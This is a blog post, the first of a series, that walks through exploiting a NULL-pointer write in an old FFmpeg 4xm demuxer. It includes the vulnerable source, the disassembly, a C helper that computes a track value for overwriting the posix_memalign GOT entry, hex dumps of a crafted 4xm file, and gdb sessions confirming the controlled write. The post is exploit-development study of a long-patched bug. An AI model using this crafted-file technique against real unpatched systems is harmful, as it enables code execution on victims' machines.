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practical bughunting pt.0x1

null ptr ftw

This will begin a series of blog posts documenting my independant learning contract in security bug hunting! My goal was to write an exploit for an existing well documented bug and then to find a bug in some media parser manually. For the well documented bug to investigate i chose a null pointer dereference bug in ffmpeg which is documented in a bug hunter’s diary chapter 4.

retrieving the vulnerable code

The svn command cited on the book’s website (svn checkout svn://svn.ffmpeg.org/ffmpeg/trunk@16556 ffmpeg) did not work for me, the error message returned to me was as follows:

 A    ffmpeg/MAINTAINERS
 A    ffmpeg/cmdutils.h
  U   ffmpeg
 svn: warning: W205011: Error handling externals definition for 'ffmpeg/libswscale':
 svn: warning: W170000: URL 'svn://svn.ffmpeg.org/mplayer/trunk/libswscale' at revision 38109 doesn't exist
 Checked out revision 16556.
 svn: E205011: Failure occurred processing one or more externals definitions

Although the error message implies missing files on the remote repository my final solution did not involve resolving anything like that. Since the ffmpeg project has moved to github since the book’s writing i decided to use git and find how to use svn revision numbers with git. I found this handy tutorial and then the following series of commands gave me the complete vulnerable source code:

 git clone git://source.ffmpeg.org/ffmpeg
 git checkout -b svn_16556 :/'as revision 16556'

describing the vulnerability

As it relates to the null pointer dereference bug we will be targeting the 4xm file format parser (specifically the part which parses the sound track chunks) within ffmpeg. 4xm files have the following general structure (i won’t go into detail since this is already written about:

 RIFF header
   LIST-HEAD chunk
     LIST-HNFO chunk
   LIST-TRK_ chunk
     LIST-VTRK chunk       [video track]
     LIST-STRK chunk       [sound track]
     [..more tracks..]
   LIST-MOVI chunk
     LIST-FRAM chunk
     LIST-FRAM chunk
     LIST-FRAM chunk
     [..more frame tracks..]

The relevant section of code is in libavformat/4xm.c on line 93:

static int fourxm_read_header(AVFormatContext *s,
                              AVFormatParameters *ap)
    ByteIOContext *pb = s->pb;
    unsigned int fourcc_tag;
    unsigned int size;
    int header_size;
    FourxmDemuxContext *fourxm = s->priv_data;
    unsigned char *header;
    int i;
    int current_track = -1;
    AVStream *st;

    fourxm->track_count = 0;
    fourxm->tracks = NULL;
    fourxm->selected_track = 0;
    fourxm->fps = 1.0;

    /* skip the first 3 32-bit numbers */
    url_fseek(pb, 12, SEEK_CUR);

    /* check for LIST-HEAD */
    header_size = size - 4;
    if (fourcc_tag != HEAD_TAG)

    /* allocate space for the header and load the whole thing */
    header = av_malloc(header_size);
    if (!header)
        return AVERROR(ENOMEM);
    if (get_buffer(pb, header, header_size) != header_size)
        return AVERROR(EIO);

     /* take the lazy approach and search for any and all vtrk and strk chunks */
     for (i = 0; i < header_size - 8; i++) {
         fourcc_tag = AV_RL32(&header[i]);
         size = AV_RL32(&header[i + 4]);

         if (fourcc_tag == std__TAG) {
             fourxm->fps = av_int2flt(AV_RL32(&header[i + 12]));
         } else if (fourcc_tag == vtrk_TAG) {
             /* check that there is enough data */
             if (size != vtrk_SIZE) {
                 return AVERROR_INVALIDDATA;
             fourxm->width = AV_RL32(&header[i + 36]);
             fourxm->height = AV_RL32(&header[i + 40]);

             /* allocate a new AVStream */
             st = av_new_stream(s, 0);
             if (!st)
                 return AVERROR(ENOMEM);
             av_set_pts_info(st, 60, 1, fourxm->fps);

             fourxm->video_stream_index = st->index;

             st->codec->codec_type = CODEC_TYPE_VIDEO;
             st->codec->codec_id = CODEC_ID_4XM;
             st->codec->extradata_size = 4;
             st->codec->extradata = av_malloc(4);
             AV_WL32(st->codec->extradata, AV_RL32(&header[i + 16]));
             st->codec->width = fourxm->width;
             st->codec->height = fourxm->height;

             i += 8 + size;
         } else if (fourcc_tag == strk_TAG) {
             /* check that there is enough data */
             if (size != strk_SIZE) {
                 return AVERROR_INVALIDDATA;
             current_track = AV_RL32(&header[i + 8]); // !! uint -> int
             if (current_track + 1 > fourxm->track_count) { // b00m
                 fourxm->track_count = current_track + 1;
                 if((unsigned)fourxm->track_count >= UINT_MAX / sizeof(AudioTrack))
                     return -1;
                 fourxm->tracks = av_realloc(fourxm->tracks, // we can avoid this s.t fourxm->tracks is null
                     fourxm->track_count * sizeof(AudioTrack));
                 if (!fourxm->tracks) {
                     return AVERROR(ENOMEM);
             fourxm->tracks[current_track].adpcm = AV_RL32(&header[i + 12]); // here we deref whatever addr we can put into current_track
             fourxm->tracks[current_track].channels = AV_RL32(&header[i + 36]);
             fourxm->tracks[current_track].sample_rate = AV_RL32(&header[i +    40]);
             fourxm->tracks[current_track].bits = AV_RL32(&header[i + 44]);
             i += 8 + size;

             /* allocate a new AVStream */
             st = av_new_stream(s, current_track);
             if (!st)
                 return AVERROR(ENOMEM);

             av_set_pts_info(st, 60, 1, fourxm->tracks[current_track].sample_rate);

             fourxm->tracks[current_track].stream_index = st->index;

             st->codec->codec_type = CODEC_TYPE_AUDIO;
             st->codec->codec_tag = 0;
             st->codec->channels = fourxm->tracks[current_track].channels;
             st->codec->sample_rate = fourxm->tracks[current_track].sample_rate;
             st->codec->bits_per_coded_sample = fourxm->tracks[current_track].  bits;
             st->codec->bit_rate = st->codec->channels * st->codec->sample_rate *
             st->codec->block_align = st->codec->channels * st->codec->bits_per_coded_sample;
             if (fourxm->tracks[current_track].adpcm)
                 st->codec->codec_id = CODEC_ID_ADPCM_4XM;
             else if (st->codec->bits_per_coded_sample == 8)
                 st->codec->codec_id = CODEC_ID_PCM_U8;
                 st->codec->codec_id = CODEC_ID_PCM_S16LE;


     /* skip over the LIST-MOVI chunk (which is where the stream should be */
     if (fourcc_tag != MOVI_TAG)
         return AVERROR_INVALIDDATA;

     /* initialize context members */
     fourxm->video_pts = -1;  /* first frame will push to 0 */
     fourxm->audio_pts = 0;

     return 0;

Breaking this down; the author tells us that the vulnerability lies in the fact that we can avoid the line fourxm->tracks = av_realloc(fourxm->tracks,... and thus when we arrive at fourxm->tracks[current_track].adpcm = AV_RL32(&header[i + 12]); the fourxm->tracks will be null and we can control the address to write to with the current_track variable which is read from our media file. Breaking this down even further the fourxm struct has the following members which include the relevant member AudioTrack *tracks;:

 typedef struct FourxmDemuxContext {
     int width;
     int height;
     int video_stream_index;
     int track_count;
     AudioTrack *tracks;
     int selected_track;

     int64_t audio_pts;
     int64_t video_pts;
     float fps;
 } FourxmDemuxContext;

The AudioTrack struct has the following members (and all the members are 4 bytes in size):

 typedef struct AudioTrack {
     int sample_rate;        
     int bits;               
     int channels;           
     int stream_index;       
     int adpcm;              
 } AudioTrack;

again looking at the line of interest fourxm->tracks[current_track].adpcm = AV_RL32(&header[i + 12]); i was interested in this AV_RL32 macro. I found its definition in libavutil/intreadwrite.h on line 80:

#  define AV_RL32(x)    bswap_32(AV_RN32(x))

as we continue down the line of function definitions we can see in libavutil/bswap.h on line 52 the definition for the bswap_32 function:

static av_always_inline av_const uint32_t bswap_32(uint32_t x)
     x= ((x<<8)&0xFF00FF00) | ((x>>8)&0x00FF00FF);
     x= (x>>16) | (x<<16);
     return x;

this one may seem confusing to follow but basically its doing some bytes swapping, you can simulate what it does in the python interpreter like so:

>>> x = 0xaabbccdd

>>> x = ((x<<8)&0xFF00FF00) | ((x>>8)&0x00FF00FF)

>>> hex(x)

>>> x= ((x>>16) | (x<<16)) & 0xffffffff

>>> # the extra & at the end just simulates the truncation

>>> # C would do since python has infinite precision

>>> hex(x)

Reviewing once again what the author says in the book:

 1. fourxm->tracks is initialized with NULL (see line 107).
 2. If the processed media file contains a strk chunk, the value of
 current_track is extracted from the user-controlled data of the
 chunk (see line 166).
 3. If the value of current_track + 1 is less than zero, the heap buffer
 isn’t allocated.
 4. fourxm->tracks still points to memory address NULL.
 5. The resulting NULL pointer is then dereferenced by the usercontrolled
 value of current_track, and four 32-bit values of usercontrolled
 data are assigned to the dereferenced locations (see
 lines 178–181).
 6. Four user-controlled memory locations can be overwritten with
 four user-controlled data bytes each.

verifying the vulnerability at a low level

You might be thinking to yourself - this arbitrary write is simple! fourxm->tracks is null, plus our controlled current_track gives us an arbitrary write! Afterwards you may be surprised to find the following assembly for that assignment:

In the author says the algorithm is as such:

 edx + ((ebx + ebx * 4) << 2) + 0x10 = destination address of write operation

Ours might look a bit different if you compiled ffmpeg as a 64 bit binary, let’s dissect the asm:

0x0046171e      4863ca         movsxd rcx, edx
0x00461721      418b742e0c     mov esi, dword [r14 + rbp + 0xc] ; [0xc:4]=-1 ; 12
0x00461726      488b7c2408     mov rdi, qword [rsp + 8]    ; [0x8:8]=-1 ; 8
0x0046172b      488d0c89       lea rcx, [rcx + rcx*4]
0x0046172f      83c330         add ebx, 0x30               ; '0'
0x00461732      4c8d2c8d0000.  lea r13, [rcx*4]
0x0046173a      48894c2410     mov qword [rsp + 0x10], rcx
0x0046173f      4c01e8         add rax, r13                ; 'o'
0x00461742      897010         mov dword [rax + 0x10], esi

As we begin edx is our current track. movsxd extends our 32 bit value to a 64 bit value so 0xffffffff becomes 0xffffffffffffffff

At 0x0046172b we see rcx = rcx + rcx * 4, then at 0x00461732 r13 = rcx * 4 once again.

Thus we have r13 = (rcx + rcx * 4) * 4 or the equivalent: r13 = (rcx + rcx * 4) << 2 as the author wrote (i missed a detail here! there is a trailing + 0x10 at the end! i will talk more about this later.).

verifying exploitability

The author suggests using a global offset table (GOT) overwrite as an exploit tactic, specifically the next function call which is dynamically linked is a call to memalign.

I decided I wanted to 1up mgeeky’s exploit and write one with a DEP bypass along with the ASLR bypass. In order to bypass ASLR we must use a 32 bit binary unless we use an information leak, let’s leave that task for another time. First I attempt to write 0xffffffff to the memalign GOT entry.

The memalign GOT entry can be found with the following command:

$ file ./ffmpeg
./ffmpeg: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=fd2c79851e74389d11c9bec02388b0e47ffb6881, not stripped
$ readelf --relocs ./ffmpeg | grep -i memalign
084ef134  00004807 R_386_JUMP_SLOT   00000000   posix_memalign@GLIBC_2.2

Using the code from the book to find the correct value for current_track I tweaked it a little and came up with the following:

#include <stdio.h>

// GOT entry address of memalign()
#define MEMALIGN_GOT_ADDR       0x084ef134

// Min and max value for 'current_track'
#define SEARCH_START            0x80000000
#define SEARCH_END              0xFFFFFFFF

int main() {
    unsigned int a, b = 0;

    for (a = SEARCH_START; a < SEARCH_END; a++) {
        b = (a * 20);
        if (b == TEST_ADDR) {
            printf("Value for 'current_track': %08x\n", a);
            return 0;

When run it gives us the following:

Value for 'current_track': 8d3725a9

Now all I needed was a valid 4xm file to modify with this value for the current_track which i found following a link from the book. I cracked it open with r2 -w dracula.4xm, then i could modify it in a hex editor like view with the V command. We are greeted with the hex encoded file:

[0x00000000 0% 2408 dracula.4xm]> xc
- offset -   0 1  2 3  4 5  6 7  8 9  A B  C D  E F  0123456789ABCDEF  comment
0x00000000  5249 4646 6ee1 4b01 3458 4d56 4c49 5354  RIFFn.K.4XMVLIST
0x00000010  f202 0000 4845 4144 4c49 5354 7400 0000  ....HEADLISTt...
0x00000020  484e 464f 6e61 6d65 2d00 0000 433a 5c34  HNFOname-...C:\4
0x00000030  785c 3458 4d4f 5649 4520 5631 2e30 5c62  x\4XMOVIE V1.0\b
0x00000040  696e 5c6d 316d 6963 6861 6469 6167 3033  in\m1michadiag03
0x00000050  5f34 3030 2e34 586d 0000 696e 666f 2200  _400.4Xm..info".
0x00000060  0000 5061 636b 6564 2077 6974 6820 3478  ..Packed with 4x
0x00000070  6d6f 7669 6520 762e 2033 2e32 2e30 2e31  movie v.
0x00000080  3431 3200 7374 645f 0800 0000 4c1f 0800  412.std_....L...
0x00000090  0000 7041 4c49 5354 6a02 0000 5452 4b5f  ..pALISTj...TRK_
0x000000a0  4c49 5354 7600 0000 5654 524b 6e61 6d65  LISTv...VTRKname
0x000000b0  1e00 0000 5c5c 506f 6972 6f5c 4156 495c  ....\\Poiro\AVI\
0x000000c0  4d31 4d69 6368 6144 6961 6730 332e 6176  M1MichaDiag03.av
0x000000d0  6900 7674 726b 4400 0000 0000 0000 0000  i.vtrkD.........
0x000000e0  0000 0200 0300 8405 0000 6202 0000 0000  ..........b.....
0x000000f0  0000 6102 0000 8002 0000 e001 0000 8002  ..a.............
0x00000100  0000 e001 0000 0000 0000 0000 0000 0000  ................
0x00000110  0000 0000 0000 0000 0000 0000 0000 4c49  ..............LI
0x00000120  5354 4a00 0000 5354 524b 6e61 6d65 0d00  STJ...STRKname..
0x00000130  0000 6672 616e 6361 6973 2e77 6176 0000  ..francais.wav..
0x00000140  7374 726b 2800 0000 0000 0000 0100 0000  strk(...........
0x00000150  0000 0400 e903 0000 6202 0000 0000 0000  ........b.......
0x00000160  6102 0000 0200 0000 2256 0000 1000 0000  a......."V......
0x00000170  4c49 5354 4a00 0000 5354 524b 6e61 6d65  LISTJ...STRKname
0x00000180  0d00 0000 6573 7061 676e 6f6c 2e77 6176  ....espagnol.wav
0x00000190  0000 7374 726b 2800 0000 0100 0000 0100  ..strk(.........
0x000001a0  0000 0000 0400 e903 0000 6202 0000 0000  ..........b.....
0x000001b0  0000 6102 0000 0200 0000 2256 0000 1000  ..a......."V....

In order to find where we must write the current_track we must understand that STRK chunks have the following structure (which i found in our handy 4xm file format reference here):

 bytes 0-3    fourcc: 'strk'
 bytes 4-7    length of strk structure (40 or 0x28 by
 bytes 8-11   track number
 bytes 12-15  audio type: 0 = PCM, 1 = 4X IMA ADPCM 
 bytes 16-35  unknown
 bytes 36-39  number of audio channels
 bytes 40-43  audio sample rate
 bytes 44-47  audio sample resolution (8 or 16 bits)

According to this reference the track number comes 4 bytes after the ‘strk’ string. Notice in the hex view above our first sound track is at offset 0x140:

0x00000140  7374 726b 2800 0000 0000 0000 0100 0000  strk(...........

Therefore our track_number could be written at offset 0x140 + 8 = 0x148. Verifying that this works we need to write a value to confirm we can make this write to the value read on the right hand sign of the assignment fourxm->tracks[current_track].adpcm = AV_RL32(&header[i + 12]); we can tell that this is read from the following 4 bytes after the track number by referencing where the track number is read from; current_track = AV_RL32(&header[i + 8]);.

My resulting 4xm file to confirm exploitability had the following bytes at offset 0x140:

[0x00000000 0% 2408 dracula.4xm]> xc
- offset -   0 1  2 3  4 5  6 7  8 9  A B  C D  E F  0123456789ABCDEF  comment
0x00000000  5249 4646 6ee1 4b01 3458 4d56 4c49 5354  RIFFn.K.4XMVLIST
0x00000010  f202 0000 4845 4144 4c49 5354 7400 0000  ....HEADLISTt...
0x00000020  484e 464f 6e61 6d65 2d00 0000 433a 5c34  HNFOname-...C:\4
0x00000030  785c 3458 4d4f 5649 4520 5631 2e30 5c62  x\4XMOVIE V1.0\b
0x00000040  696e 5c6d 316d 6963 6861 6469 6167 3033  in\m1michadiag03
0x00000050  5f34 3030 2e34 586d 0000 696e 666f 2200  _400.4Xm..info".
0x00000060  0000 5061 636b 6564 2077 6974 6820 3478  ..Packed with 4x
0x00000070  6d6f 7669 6520 762e 2033 2e32 2e30 2e31  movie v.
0x00000080  3431 3200 7374 645f 0800 0000 4c1f 0800  412.std_....L...
0x00000090  0000 7041 4c49 5354 6a02 0000 5452 4b5f  ..pALISTj...TRK_
0x000000a0  4c49 5354 7600 0000 5654 524b 6e61 6d65  LISTv...VTRKname
0x000000b0  1e00 0000 5c5c 506f 6972 6f5c 4156 495c  ....\\Poiro\AVI\
0x000000c0  4d31 4d69 6368 6144 6961 6730 332e 6176  M1MichaDiag03.av
0x000000d0  6900 7674 726b 4400 0000 0000 0000 0000  i.vtrkD.........
0x000000e0  0000 0200 0300 8405 0000 6202 0000 0000  ..........b.....
0x000000f0  0000 6102 0000 8002 0000 e001 0000 8002  ..a.............
0x00000100  0000 e001 0000 0000 0000 0000 0000 0000  ................
0x00000110  0000 0000 0000 0000 0000 0000 0000 4c49  ..............LI
0x00000120  5354 4a00 0000 5354 524b 6e61 6d65 0d00  STJ...STRKname..
0x00000130  0000 6672 616e 6361 6973 2e77 6176 0000  ..francais.wav..
0x00000140  7374 726b 2800 0000 a925 378d ffff ffff  strk(....%7.....
0x00000150  0000 0400 e903 0000 6202 0000 0000 0000  ........b.......
0x00000160  6102 0000 0200 0000 2256 0000 1000 0000  a......."V......
0x00000170  4c49 5354 4a00 0000 5354 524b 6e61 6d65  LISTJ...STRKname
0x00000180  0d00 0000 6573 7061 676e 6f6c 2e77 6176  ....espagnol.wav
0x00000190  0000 7374 726b 2800 0000 0100 0000 0100  ..strk(.........
0x000001a0  0000 0000 0400 e903 0000 6202 0000 0000  ..........b.....
0x000001b0  0000 6102 0000 0200 0000 2256 0000 1000  ..a......."V....

The final step to confirming exploitability would be to run the program and ensure that after our controlled write subsequent calls to memalign lead to address 0xffffffff.

Num     Type           Disp Enb Address    What
4       breakpoint     keep y   0x080aaeec in fourxm_read_header at libavformat/4xm.c:178
6       breakpoint     keep n   0x083f073e in av_mallocz at libavutil/mem.c:62
        breakpoint already hit 1 time
gef➤  r -i dracula.4xm
Starting program: /home/ryuk/Documents/spring18/ffmpeg_bhd/i686/ffmpeg/ffmpeg -i dracula.4xm
FFmpeg version git-6a5d31a, Copyright (c) 2000-2009 Fabrice Bellard, et al.
  configuration: --disable-stripping --extra-cflags=-z execstack
  libavutil     49.12. 0 / 49.12. 0
  libavcodec    52.10. 0 / 52.10. 0
  libavformat   52.23. 1 / 52.23. 1
  libavdevice   52. 1. 0 / 52. 1. 0
  built on May 31 2018 17:48:47, gcc: 4.8.4

Breakpoint 4, 0x080aaeec in fourxm_read_header (s=0x881d330, ap=0xffffd350) at libavformat/4xm.c:178
178     libavformat/4xm.c: No such file or directory.
[ Legend: Modified register | Code | Heap | Stack | String ]
───────────────────────────────────────────────────────[ registers ]────
$eax   : 0x084ef134  →  0xf7e11310  →  <posix_memalign+0> push ebx
$ebx   : 0x00000128
$ecx   : 0x084ef134  →  0xf7e11310  →  <posix_memalign+0> push ebx
$edx   : 0xc213bc4d
$esp   : 0xffffd1a0  →  0x00000004
$ebp   : 0x8d3725a9
$esi   : 0x08826400  →  "LISTt"
$edi   : 0x088263c0  →  0x00000280
$eip   : 0x080aaeec  →  <fourxm_read_header+668> mov DWORD PTR [esp+0x20], ecx
$eflags: [carry parity adjust zero sign trap INTERRUPT direction overflow resume virtualx86 identification]
$ds: 0x002b  $ss: 0x002b  $fs: 0x0000  $es: 0x002b  $gs: 0x0063  $cs: 0x0023
───────────────────────────────────────────────────────────[ stack ]────
0xffffd1a0│+0x00: 0x00000004     ← $esp
0xffffd1a4│+0x04: 0x0000003c ("<"?)
0xffffd1a8│+0x08: 0x00000001
0xffffd1ac│+0x0c: 0x0000000f
0xffffd1b0│+0x10: 0x084ef048  →  0xf7e0f470  →  <free+0> push ebx
0xffffd1b4│+0x14: 0xf7ec3c5d  →  <__memset_sse2_rep+269> add ebx, 0x3dc83
0xffffd1b8│+0x18: 0x088263c0  →  0x00000280
0xffffd1bc│+0x1c: 0x000002e6
───────────────────────────────────────────────────────[ code:i386 ]────
    0x80aaedf <fourxm_read_header+655> lea    edx, [ebp+ebp*4+0x0]
    0x80aaee3 <fourxm_read_header+659> lea    ecx, [edx*4+0x0]
    0x80aaeea <fourxm_read_header+666> add    eax, ecx
 →  0x80aaeec <fourxm_read_header+668> mov    DWORD PTR [esp+0x20], ecx
    0x80aaef0 <fourxm_read_header+672> mov    ecx, DWORD PTR [esi+ebx*1+0xc]
    0x80aaef4 <fourxm_read_header+676> mov    DWORD PTR [esp+0x24], edx
    0x80aaef8 <fourxm_read_header+680> mov    DWORD PTR [eax+0x10], ecx
    0x80aaefb <fourxm_read_header+683> mov    ecx, DWORD PTR [esi+ebx*1+0x24]
    0x80aaeff <fourxm_read_header+687> mov    DWORD PTR [eax+0x8], ecx
─────────────────────────────────────────────────────────[ threads ]────
[#0] Id 1, Name: "ffmpeg", stopped, reason: BREAKPOINT
───────────────────────────────────────────────────────────[ trace ]────
[#0] 0x80aaeec → Name: fourxm_read_header(s=0x881d330, ap=0xffffd350)
[#1] 0x8083069 → Name: av_open_input_stream(ic_ptr=0xffffd34c, pb=0x8826340, filename=0xffffd70f "dracula.4xm", fmt=0x84f0fe0 <fourxm_demuxer>, ap=0xffffd350)
[#2] 0x808b0d4 → Name: av_open_input_file(ic_ptr=0xffffd34c, filename=0xffffd70f "dracula.4xm", fmt=0x84f0fe0 <fourxm_demuxer>, buf_size=0x0, ap=0xffffd350)
[#3] 0x807b335 → Name: opt_input_file(filename=<optimized out>)
[#4] 0x807c983 → Name: parse_options(argc=0x3, argv=0xffffd584, options=0x83f5560 <options>, parse_arg_function=0x807a3e0 <opt_output_file>)
[#5] 0x8073326 → Name: main(argc=0x3, argv=0xffffd584)
gef➤  enable 6
gef➤  i b
Num     Type           Disp Enb Address    What
4       breakpoint     keep y   0x080aaeec in fourxm_read_header at libavformat/4xm.c:178
        breakpoint already hit 1 time
6       breakpoint     keep y   0x083f073e in av_mallocz at libavutil/mem.c:62
gef➤  c

Breakpoint 6, 0x083f073e in av_malloc (size=0x164) at libavutil/mem.c:62
62      libavutil/mem.c: No such file or directory.
[ Legend: Modified register | Code | Heap | Stack | String ]
───────────────────────────────────────────────────────[ registers ]────
$eax   : 0xffffd15c  →  0x00000000
$ebx   : 0x00000000
$ecx   : 0x00000010
$edx   : 0xc213bc4d
$esp   : 0xffffd140  →  0xffffd15c  →  0x00000000
$ebp   : 0x8d3725a9
$esi   : 0x00000164
$edi   : 0x088263c0  →  0x00000280
$eip   : 0x083f073e  →  <av_mallocz+46> call 0x805b910 <posix_memalign@plt>
$eflags: [CARRY parity ADJUST zero SIGN trap INTERRUPT direction overflow resume virtualx86 identification]
$ds: 0x002b  $ss: 0x002b  $fs: 0x0000  $es: 0x002b  $gs: 0x0063  $cs: 0x0023
───────────────────────────────────────────────────────────[ stack ]────
0xffffd140│+0x00: 0xffffd15c  →  0x00000000      ← $esp
0xffffd144│+0x04: 0x00000010
0xffffd148│+0x08: 0x00000164
0xffffd14c│+0x0c: 0x00000010
0xffffd150│+0x10: 0x08826400  →  "LISTt"
0xffffd154│+0x14: 0x088263c0  →  0x00000280
0xffffd158│+0x18: 0x088268a0  →  0x08407a40  →  0x084069a0  →  "AVCodecContext"
0xffffd15c│+0x1c: 0x00000000     ← $eax
───────────────────────────────────────────────────────[ code:i386 ]────
    0x83f072f <av_mallocz+31>  mov    DWORD PTR [esp+0x8], esi
    0x83f0733 <av_mallocz+35>  mov    DWORD PTR [esp+0x4], 0x10
    0x83f073b <av_mallocz+43>  mov    DWORD PTR [esp], eax
 →  0x83f073e <av_mallocz+46>  call   0x805b910 <posix_memalign@plt>
   ↳   0x805b910 <posix_memalign@plt+0> jmp    DWORD PTR ds:0x84ef134
       0x805b916 <posix_memalign@plt+6> push   0x250
       0x805b91b <posix_memalign@plt+11> jmp    0x805b460
       0x805b920 <fcntl@plt+0>    jmp    DWORD PTR ds:0x84ef138
       0x805b926 <fcntl@plt+6>    push   0x258
       0x805b92b <fcntl@plt+11>   jmp    0x805b460
─────────────────────────────────────────────[ arguments (guessed) ]────
posix_memalign@plt (
   [sp + 0x0] = 0x00000010,
   [sp + 0x4] = 0x00000164,
   [sp + 0x8] = 0x00000010
─────────────────────────────────────────────────────────[ threads ]────
[#0] Id 1, Name: "ffmpeg", stopped, reason: BREAKPOINT
───────────────────────────────────────────────────────────[ trace ]────
[#0] 0x83f073e → Name: av_malloc(size=0x164)
[#1] 0x83f073e → Name: av_mallocz(size=0x164)
[#2] 0x8087f60 → Name: av_new_stream(s=0x881d330, id=0x8d3725a9)
[#3] 0x80aaf22 → Name: fourxm_read_header(s=0x881d330, ap=0xffffd350)
[#4] 0x8083069 → Name: av_open_input_stream(ic_ptr=0xffffd34c, pb=0x8826340, filename=0xffffd70f "dracula.4xm", fmt=0x84f0fe0 <fourxm_demuxer>, ap=0xffffd350)
[#5] 0x808b0d4 → Name: av_open_input_file(ic_ptr=0xffffd34c, filename=0xffffd70f "dracula.4xm", fmt=0x84f0fe0 <fourxm_demuxer>, buf_size=0x0, ap=0xffffd350)
[#6] 0x807b335 → Name: opt_input_file(filename=<optimized out>)
[#7] 0x807c983 → Name: parse_options(argc=0x3, argv=0xffffd584, options=0x83f5560 <options>, parse_arg_function=0x807a3e0 <opt_output_file>)
[#8] 0x8073326 → Name: main(argc=0x3, argv=0xffffd584)
gef➤  x/xw 0x84ef134
0x84ef134 <posix_memalign@got.plt>:     0x00005622

Ah so it seems this wasn’t sufficient to overwrite memalign’s GOT address with 0xffffffff, instead we got this 0x5622. where is this from? Recall that we are targetting this line of code: fourxm->tracks[current_track].adpcm = AV_RL32(&header[i + 12]);. Perhaps we have the correct value for current_track but not fourxm->tracks[current_track].adpcm? Recall the definition for an Audio Track?

 typedef struct AudioTrack {
     int sample_rate;        
     int bits;               
     int channels;           
     int stream_index;       
     int adpcm;              
 } AudioTrack;

The int adpcm; field is last! In fact, from the beginning of an audio track it is 16 bytes away. Perhaps if we looked a tad further we’d see our intended value?

gef➤  dereference 0x84ef134 10
0x084ef134│+0x00: 0x00005622 (""V"?)
0x084ef138│+0x04: <fcntl@got.plt+0> adc BYTE PTR [eax], al
0x084ef13c│+0x08: <bind@got.plt+0> add al, BYTE PTR [eax]
0x084ef140│+0x0c: 0x0805b946  →  <dlsym@plt+6> push 0x268
0x084ef144│+0x10: <ftell@got.plt+0> (bad)                           <------ bad??
0x084ef148│+0x14: 0x0805b966  →  <__isoc99_sscanf@plt+6> push 0x278
0x084ef14c│+0x18: 0x0805b976  →  <gmtime@plt+6> push 0x280
0x084ef150│+0x1c: 0xf7ec3b50  →  <__memset_sse2_rep+0> push ebx
0x084ef154│+0x20: 0x0805b996  →  <snprintf@plt+6> push 0x290
0x084ef158│+0x24: 0x0805b9a6  →  <tanh@plt+6> push 0x298
gef➤  x/xw 0x84ef144
0x84ef144 <ftell@got.plt>:      0xffffffff                          <------ b00m

Okay, so what we want to target with our value is not fourxm->tracks[current_track].adcpm but fourxm->tracks[current_track].sample_rate. Fortunately a few assignments later there is an assignment to the sample_rate field, we should write to header[i + 40] not header[i + 12] as we have:

fourxm->tracks[current_track].sample_rate = AV_RL32(&header[i + 40]);

Since i + 8 was at offset 0x148 and we now want i + 40 we can just add 32 to 0x148; 0x168. Let’s give this a try and see what happens!

gef➤  i b
Num     Type           Disp Enb Address    What
4       breakpoint     keep y   0x080aaeec in fourxm_read_header at libavformat/4xm.c:178
        breakpoint already hit 1 time
6       breakpoint     keep n   0x083f073e in av_mallocz at libavutil/mem.c:62
gef➤  r -i dracula.4xm
Starting program: /home/ryuk/Documents/spring18/ffmpeg_bhd/i686/ffmpeg/ffmpeg -i dracula.4xm
FFmpeg version git-6a5d31a, Copyright (c) 2000-2009 Fabrice Bellard, et al.
  configuration: --disable-stripping --extra-cflags=-z execstack
  libavutil     49.12. 0 / 49.12. 0
  libavcodec    52.10. 0 / 52.10. 0
  libavformat   52.23. 1 / 52.23. 1
  libavdevice   52. 1. 0 / 52. 1. 0
  built on May 31 2018 17:48:47, gcc: 4.8.4

Breakpoint 4, 0x080aaeec in fourxm_read_header (s=0x881d330, ap=0xffffd350) at libavformat/4xm.c:178
178     in libavformat/4xm.c
[ Legend: Modified register | Code | Heap | Stack | String ]
───────────────────────────────────────────────────────[ registers ]────
$eax   : 0x084ef134  →  0xf7e11310  →  <posix_memalign+0> push ebx
$ebx   : 0x00000128
$ecx   : 0x084ef134  →  0xf7e11310  →  <posix_memalign+0> push ebx
$edx   : 0xc213bc4d
$esp   : 0xffffd1a0  →  0x00000004
$ebp   : 0x8d3725a9
$esi   : 0x08826400  →  "LISTt"
$edi   : 0x088263c0  →  0x00000280
$eip   : 0x080aaeec  →  <fourxm_read_header+668> mov DWORD PTR [esp+0x20], ecx
$eflags: [carry parity adjust zero sign trap INTERRUPT direction overflow resume virtualx86 identification]
$ds: 0x002b  $ss: 0x002b  $fs: 0x0000  $es: 0x002b  $gs: 0x0063  $cs: 0x0023
───────────────────────────────────────────────────────────[ stack ]────
0xffffd1a0│+0x00: 0x00000004     ← $esp
0xffffd1a4│+0x04: 0x0000003c ("<"?)
0xffffd1a8│+0x08: 0x00000001
0xffffd1ac│+0x0c: 0x0000000f
0xffffd1b0│+0x10: 0x084ef048  →  0xf7e0f470  →  <free+0> push ebx
0xffffd1b4│+0x14: 0xf7ec3c5d  →  <__memset_sse2_rep+269> add ebx, 0x3dc83
0xffffd1b8│+0x18: 0x088263c0  →  0x00000280
0xffffd1bc│+0x1c: 0x000002e6
───────────────────────────────────────────────────────[ code:i386 ]────
    0x80aaedf <fourxm_read_header+655> lea    edx, [ebp+ebp*4+0x0]
    0x80aaee3 <fourxm_read_header+659> lea    ecx, [edx*4+0x0]
    0x80aaeea <fourxm_read_header+666> add    eax, ecx
 →  0x80aaeec <fourxm_read_header+668> mov    DWORD PTR [esp+0x20], ecx
    0x80aaef0 <fourxm_read_header+672> mov    ecx, DWORD PTR [esi+ebx*1+0xc]
    0x80aaef4 <fourxm_read_header+676> mov    DWORD PTR [esp+0x24], edx
    0x80aaef8 <fourxm_read_header+680> mov    DWORD PTR [eax+0x10], ecx
    0x80aaefb <fourxm_read_header+683> mov    ecx, DWORD PTR [esi+ebx*1+0x24]
    0x80aaeff <fourxm_read_header+687> mov    DWORD PTR [eax+0x8], ecx
─────────────────────────────────────────────────────────[ threads ]────
[#0] Id 1, Name: "ffmpeg", stopped, reason: BREAKPOINT
───────────────────────────────────────────────────────────[ trace ]────
[#0] 0x80aaeec → Name: fourxm_read_header(s=0x881d330, ap=0xffffd350)
[#1] 0x8083069 → Name: av_open_input_stream(ic_ptr=0xffffd34c, pb=0x8826340, filename=0xffffd70f "dracula.4xm", fmt=0x84f0fe0 <fourxm_demuxer>, ap=0xffffd350)
[#2] 0x808b0d4 → Name: av_open_input_file(ic_ptr=0xffffd34c, filename=0xffffd70f "dracula.4xm", fmt=0x84f0fe0 <fourxm_demuxer>, buf_size=0x0, ap=0xffffd350)
